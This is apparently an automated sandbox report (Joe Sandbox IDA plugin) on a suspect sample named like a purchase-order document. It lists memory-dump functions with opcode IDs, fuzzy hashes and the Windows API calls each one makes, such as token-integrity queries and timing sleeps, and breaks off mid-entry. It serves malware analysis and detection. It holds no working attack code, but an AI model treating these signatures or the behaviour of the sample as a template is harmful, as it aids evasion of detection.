                                                                                    • Opcode ID: a6d71c3c789eb4840dc6fa0122ea8ae842e790c6e3a578a66333b14603260342
                                                                                    • Instruction ID: 2896922f7597f20aead732477500c8189541378f21f8869c9c66a1f78ee66317
                                                                                    • Opcode Fuzzy Hash: a6d71c3c789eb4840dc6fa0122ea8ae842e790c6e3a578a66333b14603260342
                                                                                    • Instruction Fuzzy Hash: EF0184726076267F272116BA6C88D7B6E7DEFC6BA1315812EF909C7201EF618D0291F0
                                                                                    APIs
                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00159693
                                                                                    • SelectObject.GDI32(?,00000000), ref: 001596A2
                                                                                    • BeginPath.GDI32(?), ref: 001596B9
                                                                                    • SelectObject.GDI32(?,00000000), ref: 001596E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                    • String ID:
                                                                                    • API String ID: 3225163088-0
                                                                                    • Opcode ID: b5017d9f9ce28acf6cf9b66b53fdaf7e7d58804ba2aeab299a8a7e63d4b62fdf
                                                                                    • Instruction ID: 4c4216d9843a8d482bf6d12be46c74766313349f713eb1e277dcaa4787e630cd
                                                                                    • Opcode Fuzzy Hash: b5017d9f9ce28acf6cf9b66b53fdaf7e7d58804ba2aeab299a8a7e63d4b62fdf
                                                                                    • Instruction Fuzzy Hash: 07219270802346EFDB119F24EC197E97BA9BF20316F108616F930AA1B0D77458A9CFD1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    • Opcode ID: 2daf661379563ecf5d41d4441b0b11d30eb02da1052cb25b747733112563a002
                                                                                    • Instruction ID: 1eaab63fb4e31776fdbd0f8182779a1821fed5a5ac948935331f3bd3e3c22a90
                                                                                    • Opcode Fuzzy Hash: 2daf661379563ecf5d41d4441b0b11d30eb02da1052cb25b747733112563a002
                                                                                    • Instruction Fuzzy Hash: 8B01F969245A05FBD31851509D42FBB735FAB323B4F844025FD16BA341F720EE2182A0
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,0016F2DE,00173863,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6), ref: 00172DFD
                                                                                    • _free.LIBCMT ref: 00172E32
                                                                                    • _free.LIBCMT ref: 00172E59
                                                                                    • SetLastError.KERNEL32(00000000,00141129), ref: 00172E66
                                                                                    • SetLastError.KERNEL32(00000000,00141129), ref: 00172E6F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 11bef305e79861f097167cdfa5eeb988d30b745a7be8f4db9664268ac17dbafe
                                                                                    • Instruction ID: 365a92885f1505d1bea3dc619ccf034290e41947a028d632bdb814cb034c71b6
                                                                                    • Opcode Fuzzy Hash: 11bef305e79861f097167cdfa5eeb988d30b745a7be8f4db9664268ac17dbafe
                                                                                    • Instruction Fuzzy Hash: F901283220660077CA2367347C49D2B267DABE53B5B35C529F82DA32D3EF708C835060
                                                                                    APIs
                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?,?,001A035E), ref: 001A002B
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?), ref: 001A0046
                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?), ref: 001A0054
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?), ref: 001A0064
                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?), ref: 001A0070
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3897988419-0
                                                                                    • Opcode ID: 3e1443d3ae695b44ecbc2305535419a29d1f26805d93b5360452a5e2387e7954
                                                                                    • Instruction ID: d49d50932769904c480542d777875eff261b5772db05a32a7e48dfe1e1202699
                                                                                    • Opcode Fuzzy Hash: 3e1443d3ae695b44ecbc2305535419a29d1f26805d93b5360452a5e2387e7954
                                                                                    • Instruction Fuzzy Hash: D101F27A602205BFDB124F68DD04FAABBEEEF48391F104529F901D2210D770CD80DBA0
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001AE997
                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 001AE9A5
                                                                                    • Sleep.KERNEL32(00000000), ref: 001AE9AD
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001AE9B7
                                                                                    • Sleep.KERNEL32 ref: 001AE9F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    • String ID:
                                                                                    • API String ID: 2833360925-0
                                                                                    • Opcode ID: b32fc3f218b8e1b3138e89ae8873a42bcbb3fb547bc835d9c665b419d39f6e9b
                                                                                    • Instruction ID: db1c8caa1e2102530ea7501b3dee6dddc860311284dbe74bec94bc30cec00fb1
                                                                                    • Opcode Fuzzy Hash: b32fc3f218b8e1b3138e89ae8873a42bcbb3fb547bc835d9c665b419d39f6e9b
                                                                                    • Instruction Fuzzy Hash: CA012D35C0262ADBCF04AFE5DC59AEEBBB8FF0A705F010556E502B2141CB309595CBA1
                                                                                    APIs
                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001A1114
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1120
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A112F
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1136
                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001A114D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 842720411-0
                                                                                    • Opcode ID: cde9b4f19e60568cc8a9ed165c8b14532787b8bf578c5716537d771718e99ead
                                                                                    • Instruction ID: ef5ae7a19fccac4a53a8549c562b17593cd2aff11d7541275e48e24880e3444c
                                                                                    • Opcode Fuzzy Hash: cde9b4f19e60568cc8a9ed165c8b14532787b8bf578c5716537d771718e99ead
                                                                                    • Instruction Fuzzy Hash: 46011D79102216FFDB114F75DC49A6A3B6EEF86364B144815FA45D7350DB31DC40DAA0
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001A0FCA
                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001A0FD6
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001A0FE5
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001A0FEC
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001A1002
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: 7dbab17680c4c3a629cbe0d5a65dc6fa1cd06d32e488a280efcaecc1d674e19e
                                                                                    • Instruction ID: 36eecdb303f24a5080bf07d7fee4d4d44e64a6f04fb4b02385b1ca37fae30a35
                                                                                    • Opcode Fuzzy Hash: 7dbab17680c4c3a629cbe0d5a65dc6fa1cd06d32e488a280efcaecc1d674e19e
                                                                                    • Instruction Fuzzy Hash: 42F04F39142312FBDB214FA49D49F563B6DEF8A761F114815F945C6291CA70DC80CAA0
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001A102A
                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001A1036
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001A1045
                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001A104C
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001A1062
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: fabe85b325c16d688c742479f256530f24b35262516c1a1a91faf79f8ad9d7bb
                                                                                    • Instruction ID: 729f6a2802812dce4a6cae013d444cf7baf37c0e6f94bfc4944f4a241ab00c36
                                                                                    • Opcode Fuzzy Hash: fabe85b325c16d688c742479f256530f24b35262516c1a1a91faf79f8ad9d7bb
                                                                                    • Instruction Fuzzy Hash: A2F06239142312FBDB215FA4ED49F563B6DFF8A761F210815F945C7290CB70D880CAA0
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B0324
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B0331
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B033E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B034B
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B0358
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B0365
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: 4139a9aaaeba43733d9d6db862cf46174b5ecc8183b672567fa7364dc07c1c32
                                                                                    • Instruction ID: 453291862663ee58c0ed70cd700c3788c9a45f121f702e46ace81d0ab0337ce6
                                                                                    • Opcode Fuzzy Hash: 4139a9aaaeba43733d9d6db862cf46174b5ecc8183b672567fa7364dc07c1c32
                                                                                    • Instruction Fuzzy Hash: 6901EA72801B059FCB32AF66D880843FBF9BF603053058A3FD19252930C3B1A988CF80
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0017D752
                                                                                      • Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
                                                                                      • Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0
                                                                                    • _free.LIBCMT ref: 0017D764
                                                                                    • _free.LIBCMT ref: 0017D776
                                                                                    • _free.LIBCMT ref: 0017D788
                                                                                    • _free.LIBCMT ref: 0017D79A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: dbc1e45fc0c0881bf4e9ccf3235187f37d02c9ebddf08927e560bceabeae277d
                                                                                    • Instruction ID: 91e9830c22ce2dfae0f5f954200b9d5d88e3e6221c7eddfcf762b7f6a86b3b2d
                                                                                    • Opcode Fuzzy Hash: dbc1e45fc0c0881bf4e9ccf3235187f37d02c9ebddf08927e560bceabeae277d
                                                                                    • Instruction Fuzzy Hash: 20F04F72540318ABC625EB78F9C6C16B7FDBF44318BA88805F14CE7502C730FC818664
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001A5C58
                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 001A5C6F
                                                                                    • MessageBeep.USER32(00000000), ref: 001A5C87
                                                                                    • KillTimer.USER32(?,0000040A), ref: 001A5CA3
                                                                                    • EndDialog.USER32(?,00000001), ref: 001A5CBD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3741023627-0
                                                                                    • Opcode ID: 132f0a60f5e30e66a0988a06fa393d8ddbd5d29b07ffa53ffe3c57820554d8e3
                                                                                    • Instruction ID: 014904c14267b7efe5cfc513c88cb3bd64970399f87b96f4ecd4cfe7dbed1a82
                                                                                    • Opcode Fuzzy Hash: 132f0a60f5e30e66a0988a06fa393d8ddbd5d29b07ffa53ffe3c57820554d8e3
                                                                                    • Instruction Fuzzy Hash: 0601D634501B04ABEB215B10ED4EFA677BDFB01B15F00065AA583A14E4DBF0A984CA90
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 001722BE
                                                                                      • Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
                                                                                      • Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0
                                                                                    • _free.LIBCMT ref: 001722D0
                                                                                    • _free.LIBCMT ref: 001722E3
                                                                                    • _free.LIBCMT ref: 001722F4
                                                                                    • _free.LIBCMT ref: 00172305
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: f3f48c3bebc11e85c1243938bc4d2c1065e58b317cb11f5e8427c1262b8373c8
                                                                                    • Instruction ID: 9f4cf643265d4b048a2883b88d2e7d46626ad17dcfb32c570f7eeb5e2434eafe
                                                                                    • Opcode Fuzzy Hash: f3f48c3bebc11e85c1243938bc4d2c1065e58b317cb11f5e8427c1262b8373c8
                                                                                    • Instruction Fuzzy Hash: ABF030B04012308BC712AF64BC4A8887B74B738750B25C606F518D32B2CF7504A39BA4
                                                                                    APIs
                                                                                    • EndPath.GDI32(?), ref: 001595D4
                                                                                    • StrokeAndFillPath.GDI32(?,?,001971F7,00000000,?,?,?), ref: 001595F0
                                                                                    • SelectObject.GDI32(?,00000000), ref: 00159603
                                                                                    • DeleteObject.GDI32 ref: 00159616
                                                                                    • StrokePath.GDI32(?), ref: 00159631
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                    • String ID:
                                                                                    • API String ID: 2625713937-0
                                                                                    • Opcode ID: d7340321d79ebb2286abc6f703fc636fc4db473c6bcdedc89a0d3abb955c1fb9
                                                                                    • Instruction ID: c75c8f9f451ff6bad523055e8a3fe5321e563a94fd3cd5504cce3c80d8931b84
                                                                                    • Opcode Fuzzy Hash: d7340321d79ebb2286abc6f703fc636fc4db473c6bcdedc89a0d3abb955c1fb9
                                                                                    • Instruction Fuzzy Hash: 9EF03C34007385EBDB165F69FD1C7A43B61AB10322F04C215FA35594F0CB3089A9DFA1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$_free
                                                                                    • String ID: a/p$am/pm
                                                                                    • API String ID: 3432400110-3206640213
                                                                                    • Opcode ID: c4c50930bb9c7eb98bb061fd4971f7b9ebab1a2297cad578519205c51eaa33be
                                                                                    • Instruction ID: 6c0b2c099d87182f4ff16dc7ebffa8ca8cc38285531f0bc0942887707fb801ee
                                                                                    • Opcode Fuzzy Hash: c4c50930bb9c7eb98bb061fd4971f7b9ebab1a2297cad578519205c51eaa33be
                                                                                    • Instruction Fuzzy Hash: 60D11231900206EADB289F6CC895BFEB7B5FF05720F29C159E90DAB651D3359D80CBA1
                                                                                    APIs
                                                                                      • Part of subcall function 00160242: EnterCriticalSection.KERNEL32(0021070C,00211884,?,?,0015198B,00212518,?,?,?,001412F9,00000000), ref: 0016024D
                                                                                      • Part of subcall function 00160242: LeaveCriticalSection.KERNEL32(0021070C,?,0015198B,00212518,?,?,?,001412F9,00000000), ref: 0016028A
                                                                                      • Part of subcall function 001600A3: __onexit.LIBCMT ref: 001600A9
                                                                                    • __Init_thread_footer.LIBCMT ref: 001C6238
                                                                                      • Part of subcall function 001601F8: EnterCriticalSection.KERNEL32(0021070C,?,?,00158747,00212514), ref: 00160202
                                                                                      • Part of subcall function 001601F8: LeaveCriticalSection.KERNEL32(0021070C,?,00158747,00212514), ref: 00160235
                                                                                      • Part of subcall function 001B359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001B35E4
                                                                                      • Part of subcall function 001B359C: LoadStringW.USER32(00212390,?,00000FFF,?), ref: 001B360A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
